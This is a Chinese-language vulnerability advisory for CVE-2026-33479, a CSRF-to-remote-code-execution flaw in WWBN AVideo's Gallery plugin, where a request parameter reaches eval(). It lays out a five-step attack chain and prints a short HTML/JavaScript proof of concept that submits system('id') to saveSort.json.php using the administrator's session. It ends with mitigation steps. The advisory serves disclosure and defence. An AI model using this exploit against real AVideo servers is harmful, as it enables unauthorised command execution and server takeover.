CVE-2026-33479 CVSS 8.8 高危

CVE-2026-33479 AVideo远程代码执行漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33479

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo <= 26.0版本存在远程代码执行漏洞。由于Gallery插件未验证CSRF令牌且Cookie配置不当，攻击者可诱导管理员访问恶意页面，利用eval()函数注入恶意代码执行任意系统命令。

技术细节

该漏洞源于Gallery插件`saveSort.json.php`接口将未过滤的`$_REQUEST['sections']`参数传入`eval()`函数。尽管接口有管理员权限检查，但缺少CSRF Token防护。配合`SameSite=None`的Cookie设置，攻击者可构造跨站请求伪造攻击。当管理员访问攻击者构造的页面时，浏览器会自动携带Session发送请求，导致服务器执行恶意PHP代码，从而实现未授权远程代码执行。

攻击链分析

STEP 1

侦察

攻击者确认目标使用的是WWBN AVideo 26.0及以下版本。

STEP 2

诱导

攻击者构造包含恶意CSRF脚本的网页，并诱导管理员访问该链接。

STEP 3

利用

管理员浏览器在后台自动向`saveSort.json.php`发送请求，携带管理员Session。

STEP 4

执行

服务器端接收参数并传入eval()函数，执行攻击者注入的恶意代码。

STEP 5

控制

攻击者成功获取服务器权限，可进一步控制目标系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- 
Conceptual CSRF PoC for CVE-2026-33479 
Target: WWBN AVideo <= 26.0 
-->
<html>
<body>
<script>
// Attacker sends a request to the Gallery plugin endpoint
// The 'sections' parameter is passed directly to eval()
var payload = "system('id');"; 
var formData = new FormData();
formData.append('sections[]', payload);

fetch('http://target-site/plugin/Gallery/saveSort.json.php', {
    method: 'POST',
    body: formData,
    credentials: 'include' // Sends the admin's session cookie
}).then(response => console.log('Request sent'));
</script>
<p>CSRF Exploit Generated</p>
</body>
</html>

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议立即限制管理后台的访问来源IP，或临时禁用Gallery插件以阻断攻击路径，直到完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表